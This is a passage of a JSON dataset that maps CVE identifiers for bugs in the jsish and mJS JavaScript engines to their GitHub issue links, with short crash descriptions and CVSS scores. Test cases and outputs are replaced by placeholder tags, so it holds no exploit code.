  77285. "exploitabilityScore": 1.8
  77286. },
  77287. {
  77288. "CVE_ID": "CVE-2021-46484",
  77289. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/73",
  77290. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/73",
  77291. "Repo_new": "pcmacdon/jsish",
  77292. "Issue_Created_At": "2021-12-24T10:41:10Z",
  77293. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case1 ERRORTAG Test case2 ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77294. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77295. "severity": "MEDIUM",
  77296. "baseScore": 5.5,
  77297. "impactScore": 3.6,
  77298. "exploitabilityScore": 1.8
  77299. },
  77300. {
  77301. "CVE_ID": "CVE-2021-46485",
  77302. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/70",
  77303. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/70",
  77304. "Repo_new": "pcmacdon/jsish",
  77305. "Issue_Created_At": "2021-12-24T10:38:22Z",
  77306. "description": "SEGV APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  77307. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77308. "severity": "MEDIUM",
  77309. "baseScore": 5.5,
  77310. "impactScore": 3.6,
  77311. "exploitabilityScore": 1.8
  77312. },
  77313. {
  77314. "CVE_ID": "CVE-2021-46486",
  77315. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/65",
  77316. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/65",
  77317. "Repo_new": "pcmacdon/jsish",
  77318. "Issue_Created_At": "2021-12-24T10:34:07Z",
  77319. "description": "SEGV APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case CODETAG \u200b Execution steps & Output ERRORTAG",
  77320. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77321. "severity": "MEDIUM",
  77322. "baseScore": 5.5,
  77323. "impactScore": 3.6,
  77324. "exploitabilityScore": 1.8
  77325. },
  77326. {
  77327. "CVE_ID": "CVE-2021-46487",
  77328. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/72",
  77329. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/72",
  77330. "Repo_new": "pcmacdon/jsish",
  77331. "Issue_Created_At": "2021-12-24T10:39:45Z",
  77332. "description": "SEGV ( PATHTAG ). Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77333. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77334. "severity": "MEDIUM",
  77335. "baseScore": 5.5,
  77336. "impactScore": 3.6,
  77337. "exploitabilityScore": 1.8
  77338. },
  77339. {
  77340. "CVE_ID": "CVE-2021-46488",
  77341. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/68",
  77342. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/68",
  77343. "Repo_new": "pcmacdon/jsish",
  77344. "Issue_Created_At": "2021-12-24T10:36:54Z",
  77345. "description": "SEGV APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77346. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77347. "severity": "MEDIUM",
  77348. "baseScore": 5.5,
  77349. "impactScore": 3.6,
  77350. "exploitabilityScore": 1.8
  77351. },
  77352. {
  77353. "CVE_ID": "CVE-2021-46489",
  77354. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/74",
  77355. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/74",
  77356. "Repo_new": "pcmacdon/jsish",
  77357. "Issue_Created_At": "2021-12-24T10:41:50Z",
  77358. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77359. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77360. "severity": "MEDIUM",
  77361. "baseScore": 5.5,
  77362. "impactScore": 3.6,
  77363. "exploitabilityScore": 1.8
  77364. },
  77365. {
  77366. "CVE_ID": "CVE-2021-46490",
  77367. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/67",
  77368. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/67",
  77369. "Repo_new": "pcmacdon/jsish",
  77370. "Issue_Created_At": "2021-12-24T10:35:45Z",
  77371. "description": "SEGV APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  77372. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77373. "severity": "MEDIUM",
  77374. "baseScore": 5.5,
  77375. "impactScore": 3.6,
  77376. "exploitabilityScore": 1.8
  77377. },
  77378. {
  77379. "CVE_ID": "CVE-2021-46491",
  77380. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/69",
  77381. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/69",
  77382. "Repo_new": "pcmacdon/jsish",
  77383. "Issue_Created_At": "2021-12-24T10:37:33Z",
  77384. "description": "SEGV APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  77385. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77386. "severity": "MEDIUM",
  77387. "baseScore": 5.5,
  77388. "impactScore": 3.6,
  77389. "exploitabilityScore": 1.8
  77390. },
  77391. {
  77392. "CVE_ID": "CVE-2021-46492",
  77393. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/71",
  77394. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/71",
  77395. "Repo_new": "pcmacdon/jsish",
  77396. "Issue_Created_At": "2021-12-24T10:38:56Z",
  77397. "description": "SEGV APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case1 APITAG Test case2 ERRORTAG Execution steps & Output ERRORTAG",
  77398. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77399. "severity": "MEDIUM",
  77400. "baseScore": 5.5,
  77401. "impactScore": 3.6,
  77402. "exploitabilityScore": 1.8
  77403. },
  77404. {
  77405. "CVE_ID": "CVE-2021-46494",
  77406. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/78",
  77407. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/78",
  77408. "Repo_new": "pcmacdon/jsish",
  77409. "Issue_Created_At": "2021-12-24T10:45:48Z",
  77410. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77411. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77412. "severity": "MEDIUM",
  77413. "baseScore": 5.5,
  77414. "impactScore": 3.6,
  77415. "exploitabilityScore": 1.8
  77416. },
  77417. {
  77418. "CVE_ID": "CVE-2021-46495",
  77419. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/82",
  77420. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/82",
  77421. "Repo_new": "pcmacdon/jsish",
  77422. "Issue_Created_At": "2021-12-24T10:48:59Z",
  77423. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77424. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77425. "severity": "MEDIUM",
  77426. "baseScore": 5.5,
  77427. "impactScore": 3.6,
  77428. "exploitabilityScore": 1.8
  77429. },
  77430. {
  77431. "CVE_ID": "CVE-2021-46496",
  77432. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/83",
  77433. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/83",
  77434. "Repo_new": "pcmacdon/jsish",
  77435. "Issue_Created_At": "2021-12-24T10:49:33Z",
  77436. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77437. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77438. "severity": "MEDIUM",
  77439. "baseScore": 5.5,
  77440. "impactScore": 3.6,
  77441. "exploitabilityScore": 1.8
  77442. },
  77443. {
  77444. "CVE_ID": "CVE-2021-46497",
  77445. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/84",
  77446. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/84",
  77447. "Repo_new": "pcmacdon/jsish",
  77448. "Issue_Created_At": "2021-12-24T10:50:28Z",
  77449. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG Execution steps & Output ERRORTAG",
  77450. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77451. "severity": "MEDIUM",
  77452. "baseScore": 5.5,
  77453. "impactScore": 3.6,
  77454. "exploitabilityScore": 1.8
  77455. },
  77456. {
  77457. "CVE_ID": "CVE-2021-46498",
  77458. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/81",
  77459. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/81",
  77460. "Repo_new": "pcmacdon/jsish",
  77461. "Issue_Created_At": "2021-12-24T10:48:23Z",
  77462. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  77463. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77464. "severity": "MEDIUM",
  77465. "baseScore": 5.5,
  77466. "impactScore": 3.6,
  77467. "exploitabilityScore": 1.8
  77468. },
  77469. {
  77470. "CVE_ID": "CVE-2021-46499",
  77471. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/76",
  77472. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/76",
  77473. "Repo_new": "pcmacdon/jsish",
  77474. "Issue_Created_At": "2021-12-24T10:44:21Z",
  77475. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77476. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77477. "severity": "MEDIUM",
  77478. "baseScore": 5.5,
  77479. "impactScore": 3.6,
  77480. "exploitabilityScore": 1.8
  77481. },
  77482. {
  77483. "CVE_ID": "CVE-2021-46500",
  77484. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/85",
  77485. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/85",
  77486. "Repo_new": "pcmacdon/jsish",
  77487. "Issue_Created_At": "2021-12-24T10:51:56Z",
  77488. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77489. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77490. "severity": "MEDIUM",
  77491. "baseScore": 5.5,
  77492. "impactScore": 3.6,
  77493. "exploitabilityScore": 1.8
  77494. },
  77495. {
  77496. "CVE_ID": "CVE-2021-46501",
  77497. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/86",
  77498. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/86",
  77499. "Repo_new": "pcmacdon/jsish",
  77500. "Issue_Created_At": "2021-12-24T10:52:55Z",
  77501. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77502. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77503. "severity": "MEDIUM",
  77504. "baseScore": 5.5,
  77505. "impactScore": 3.6,
  77506. "exploitabilityScore": 1.8
  77507. },
  77508. {
  77509. "CVE_ID": "CVE-2021-46502",
  77510. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/87",
  77511. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/87",
  77512. "Repo_new": "pcmacdon/jsish",
  77513. "Issue_Created_At": "2021-12-24T10:53:39Z",
  77514. "description": "Heap use after free ( PATHTAG ). Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77515. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77516. "severity": "MEDIUM",
  77517. "baseScore": 5.5,
  77518. "impactScore": 3.6,
  77519. "exploitabilityScore": 1.8
  77520. },
  77521. {
  77522. "CVE_ID": "CVE-2021-46503",
  77523. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/88",
  77524. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/88",
  77525. "Repo_new": "pcmacdon/jsish",
  77526. "Issue_Created_At": "2021-12-24T10:54:21Z",
  77527. "description": "Heap use after free ( PATHTAG ). Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  77528. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77529. "severity": "MEDIUM",
  77530. "baseScore": 5.5,
  77531. "impactScore": 3.6,
  77532. "exploitabilityScore": 1.8
  77533. },
  77534. {
  77535. "CVE_ID": "CVE-2021-46504",
  77536. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/51",
  77537. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/51",
  77538. "Repo_new": "pcmacdon/jsish",
  77539. "Issue_Created_At": "2021-12-24T09:40:19Z",
  77540. "description": "Assertion `vp != APITAG failed at APITAG APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution steps & Output APITAG",
  77541. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77542. "severity": "MEDIUM",
  77543. "baseScore": 5.5,
  77544. "impactScore": 3.6,
  77545. "exploitabilityScore": 1.8
  77546. },
  77547. {
  77548. "CVE_ID": "CVE-2021-46505",
  77549. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/53",
  77550. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/53",
  77551. "Repo_new": "pcmacdon/jsish",
  77552. "Issue_Created_At": "2021-12-24T09:43:02Z",
  77553. "description": "Stack overflow in ( PATHTAG ). Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77554. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77555. "severity": "MEDIUM",
  77556. "baseScore": 5.5,
  77557. "impactScore": 3.6,
  77558. "exploitabilityScore": 1.8
  77559. },
  77560. {
  77561. "CVE_ID": "CVE-2021-46506",
  77562. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/52",
  77563. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/52",
  77564. "Repo_new": "pcmacdon/jsish",
  77565. "Issue_Created_At": "2021-12-24T09:41:38Z",
  77566. "description": "Assertion `v >d.lval != v' failed at APITAG APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution steps & Output ERRORTAG",
  77567. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77568. "severity": "MEDIUM",
  77569. "baseScore": 5.5,
  77570. "impactScore": 3.6,
  77571. "exploitabilityScore": 1.8
  77572. },
  77573. {
  77574. "CVE_ID": "CVE-2021-46507",
  77575. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/54",
  77576. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/54",
  77577. "Repo_new": "pcmacdon/jsish",
  77578. "Issue_Created_At": "2021-12-24T09:43:48Z",
  77579. "description": "Stack overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case1 APITAG Test case2 ERRORTAG Execution steps & Output ERRORTAG",
  77580. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77581. "severity": "MEDIUM",
  77582. "baseScore": 5.5,
  77583. "impactScore": 3.6,
  77584. "exploitabilityScore": 1.8
  77585. },
  77586. {
  77587. "CVE_ID": "CVE-2021-46508",
  77588. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/188",
  77589. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/188",
  77590. "Repo_new": "cesanta/mjs",
  77591. "Issue_Created_At": "2021-12-31T05:23:32Z",
  77592. "description": "Assertion `i < parts_cnt' failed at APITAG struct mjs_bcode_part APITAG mjs , size_t).. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case APITAG Execution steps & Output CODETAG",
  77593. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77594. "severity": "MEDIUM",
  77595. "baseScore": 5.5,
  77596. "impactScore": 3.6,
  77597. "exploitabilityScore": 1.8
  77598. },
  77599. {
  77600. "CVE_ID": "CVE-2021-46509",
  77601. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/200",
  77602. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/200",
  77603. "Repo_new": "cesanta/mjs",
  77604. "Issue_Created_At": "2021-12-31T05:43:04Z",
  77605. "description": "Stack overflow PATHTAG in snquote. mJS revision Commit: b1b6eac URLTAG Build steps CODETAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77606. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77607. "severity": "HIGH",
  77608. "baseScore": 7.8,
  77609. "impactScore": 5.9,
  77610. "exploitabilityScore": 1.8
  77611. },
  77612. {
  77613. "CVE_ID": "CVE-2021-46510",
  77614. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/185",
  77615. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/185",
  77616. "Repo_new": "cesanta/mjs",
  77617. "Issue_Created_At": "2021-12-31T05:20:39Z",
  77618. "description": "Assertion `s < mjs >owned_strings.buf + mjs APITAG failed APITAG gc_mark_string.. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case ERRORTAG Execution steps & Output CODETAG",
  77619. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77620. "severity": "MEDIUM",
  77621. "baseScore": 5.5,
  77622. "impactScore": 3.6,
  77623. "exploitabilityScore": 1.8
  77624. },
  77625. {
  77626. "CVE_ID": "CVE-2021-46511",
  77627. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/183",
  77628. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/183",
  77629. "Repo_new": "cesanta/mjs",
  77630. "Issue_Created_At": "2021-12-31T05:18:57Z",
  77631. "description": "Assertion `m >len >= sizeof(v)' failed at APITAG mjs_pop_val . mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution steps & Output APITAG",
  77632. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77633. "severity": "MEDIUM",
  77634. "baseScore": 5.5,
  77635. "impactScore": 3.6,
  77636. "exploitabilityScore": 1.8
  77637. },
  77638. {
  77639. "CVE_ID": "CVE-2021-46512",
  77640. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/202",
  77641. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/202",
  77642. "Repo_new": "cesanta/mjs",
  77643. "Issue_Created_At": "2021-12-31T07:29:20Z",
  77644. "description": "SEGV APITAG in mjs_apply. mJS revision Commit: b1b6eac URLTAG Version: Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
  77645. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77646. "severity": "MEDIUM",
  77647. "baseScore": 5.5,
  77648. "impactScore": 3.6,
  77649. "exploitabilityScore": 1.8
  77650. },
  77651. {
  77652. "CVE_ID": "CVE-2021-46513",
  77653. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/189",
  77654. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/189",
  77655. "Repo_new": "cesanta/mjs",
  77656. "Issue_Created_At": "2021-12-31T05:24:24Z",
  77657. "description": "Global buffer overflow PATHTAG in mjs_mk_string. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  77658. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77659. "severity": "HIGH",
  77660. "baseScore": 7.8,
  77661. "impactScore": 5.9,
  77662. "exploitabilityScore": 1.8
  77663. },
  77664. {
  77665. "CVE_ID": "CVE-2021-46514",
  77666. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/187",
  77667. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/187",
  77668. "Repo_new": "cesanta/mjs",
  77669. "Issue_Created_At": "2021-12-31T05:22:41Z",
  77670. "description": "Assertion `ppos != NULL && mjs_is_number( ppos)' failed at APITAG int mjs_getretvalpos(struct mjs ).. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case ERRORTAG Execution steps & Output CODETAG",
  77671. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77672. "severity": "MEDIUM",
  77673. "baseScore": 5.5,
  77674. "impactScore": 3.6,
  77675. "exploitabilityScore": 1.8
  77676. },
  77677. {
  77678. "CVE_ID": "CVE-2021-46515",
  77679. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/186",
  77680. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/186",
  77681. "Repo_new": "cesanta/mjs",
  77682. "Issue_Created_At": "2021-12-31T05:21:24Z",
  77683. "description": "Assertion `mjs_stack_size(&mjs >scopes) >= scopes_len' failed at APITAG mjs_execute.. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case APITAG Execution steps & Output CODETAG",
  77684. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77685. "severity": "MEDIUM",
  77686. "baseScore": 5.5,
  77687. "impactScore": 3.6,
  77688. "exploitabilityScore": 1.8
  77689. },
  77690. {
  77691. "CVE_ID": "CVE-2021-46516",
  77692. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/201",
  77693. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/201",
  77694. "Repo_new": "cesanta/mjs",
  77695. "Issue_Created_At": "2021-12-31T07:26:25Z",
  77696. "description": "SEGV PATHTAG in mjs_stack_size. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77697. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77698. "severity": "MEDIUM",
  77699. "baseScore": 5.5,
  77700. "impactScore": 3.6,
  77701. "exploitabilityScore": 1.8
  77702. },
  77703. {
  77704. "CVE_ID": "CVE-2021-46517",
  77705. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/184",
  77706. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/184",
  77707. "Repo_new": "cesanta/mjs",
  77708. "Issue_Created_At": "2021-12-31T05:19:48Z",
  77709. "description": "Assertion `mjs_stack_size(&mjs >scopes NUMBERTAG failed APITAG mjs_execute.. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case ERRORTAG Execution steps & Output CODETAG",
  77710. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77711. "severity": "MEDIUM",
  77712. "baseScore": 5.5,
  77713. "impactScore": 3.6,
  77714. "exploitabilityScore": 1.8
  77715. },
  77716. {
  77717. "CVE_ID": "CVE-2021-46518",
  77718. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/195",
  77719. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/195",
  77720. "Repo_new": "cesanta/mjs",
  77721. "Issue_Created_At": "2021-12-31T05:37:12Z",
  77722. "description": "Heap buffer overflow APITAG in mjs_disown. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77723. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77724. "severity": "HIGH",
  77725. "baseScore": 7.8,
  77726. "impactScore": 5.9,
  77727. "exploitabilityScore": 1.8
  77728. },
  77729. {
  77730. "CVE_ID": "CVE-2021-46519",
  77731. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/194",
